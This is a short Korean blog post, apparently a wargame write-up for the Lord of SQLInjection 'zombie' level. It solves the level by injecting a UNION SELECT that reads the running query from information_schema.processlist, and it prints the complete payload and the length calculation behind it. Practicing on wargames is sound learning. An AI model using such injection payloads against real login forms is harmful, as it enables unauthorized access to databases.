항상 참으로 만들어도 아무 데이터도 출력되지 않는다. 아무 데이터도 없는 것 같다.
pw가 DB에 있어야만 출력이 된다.
오류창도 딱히 없다.
이전의 콰인과 굉장히 비슷해보이지만 replace의 ace를 쓸 수 없다.
select * from information_schema.processlist;
바로 직전에 실행한 쿼리문이 담기는 것을 볼 수 있다.
?pw=' union select substr(info, 38, xx) from information_schema.processlist#
<1>
s = "select pw from prob_zombie where pw='"
len(s) # 37
<2>
w = "' union select substr(info, 38, xx) from information_schema.processlist#"
len(w) # 72
xx => 72
즉
?pw=' union select substr(info, 38, 72) from information_schema.processlist#
'워게임 > LOS' 카테고리의 다른 글
| alien (!sleep(1)&&now()%2=1) (0) | 2021.10.10 |
|---|---|
| ouroboros(quine sql injection) (0) | 2021.10.09 |
| phantom(서브쿼리) (0) | 2021.10.09 |
| frankenstein(error based sqli) (0) | 2021.10.09 |
| blue_dragon(time based sql injection) (0) | 2021.10.09 |
댓글